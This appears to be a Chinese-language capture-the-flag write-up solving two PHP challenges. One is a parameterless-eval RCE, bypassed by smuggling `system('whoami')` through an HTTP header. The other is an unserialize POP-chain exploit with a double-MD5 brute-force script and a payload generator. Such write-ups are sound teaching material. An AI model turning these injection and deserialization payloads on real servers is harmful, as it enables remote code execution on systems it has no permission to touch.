rce
`<?php echo "get只接受code欧,flag在上一级目录<br>"; $filename = __FILE__; highlight_file($filename); if(isset($_GET['code'])){ if (!preg_match('/session_id\(|readfile\(/i', $_GET['code'])) { if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['code'])) { @eval($_GET['code']); } } else{ die("不让用session欧,readfile也不行"); } } ?>`
无参rce过滤了readfile和session_id方法我用的是这个
GET /1.php?code=eval(next(getallheaders())); HTTP/1.1Host: 172.28.13.107Priority: u=0, iUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:143.0) Gecko/20100101 Firefox/143.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateUpgrade-Insecure-Requests: system('whoami');
比赛的时候不知道是不是apache诶这个方法只能是apache的
用get_define_class也行这个通用
unserialize
<?php# 源码highlight_file(__FILE__);error_reporting(0);class AAA{ public $aear; public $string; public function __construct($a){ $this -> aear = $a; } function __destruct() { echo $this -> aear; } public function __toString() { $new = $this -> string; return $new(); }}class BBB { private $pop; public function __construct($string) { $this -> pop = $string; } public function __get($value) { $var = $this -> $value; $var[$value](); }}class DDD{ public $bag; public $magazine; public function __toString() { $length = @$this -> bag -> add(); return $length; } public function __set($arg1,$arg2) { if($this -> magazine -> tower) { echo "really??"; } }}class EEE{ public $d=array(); public $e; public $f; public function __get($arg1){ $this->d[$this->e]=1; if ($this->d[]=1){ echo 'nononononnnn!!!'; } else{ eval($this->f); } }}class FFF{ protected $cookie; protected function delete() { return $this -> cookie; } public function __call($func, $args) { echo 'hahahhhh'; call_user_func([$this, $func."haha"], $args); }}class GGG{ public $green; public $book; public function __invoke(){ if(md5(md5($this -> book)) == 666) { return $this -> green -> pen; } }}if(isset($_POST['UP'])) { unserialize($_POST['UP']);}
调用链为
AAA::__destruct()->AAA::__toString()->GGG::invoke()->EEE::get()
但是最后一个地方的有一个判断就是
if ($this->d[]=1){ echo 'nononononnnn!!!'; }
要让这个判断为false让d为NAN即可我们做个实验
再写个MD5爆破脚本
import hashlib
def crack(pre):for i in range(0, 999999):a=hashlib.md5(str(i).encode("UTF-8")).hexdigest()if(hashlib.md5(str(a).encode("UTF-8")).hexdigest()[0:3])==str(pre):print(i)
crack("666")
<?php
# 源码
highlight_file(__FILE__);
error_reporting(0);
class AAA{public $aear;public $string;public function __construct($a){$this -> aear = $a;}}class BBB {private $pop;}class DDD{public $bag;public $magazine;}class EEE{public $d=array();public $e;public $f;}class FFF{protected $cookie;}
class GGG{public $green;public $book;}$eee=new EEE();
$eee->d=NAN;
$eee->e=NAN;
$eee->f="system('whoami');";
$ggg=new GGG();
$ggg->green=$eee;
$ggg->book='213';
$aaaa = new AAA();
$aaaa->string = $ggg;
$aaa = new AAA($aaaa);
echo urlencode(serialize($aaa));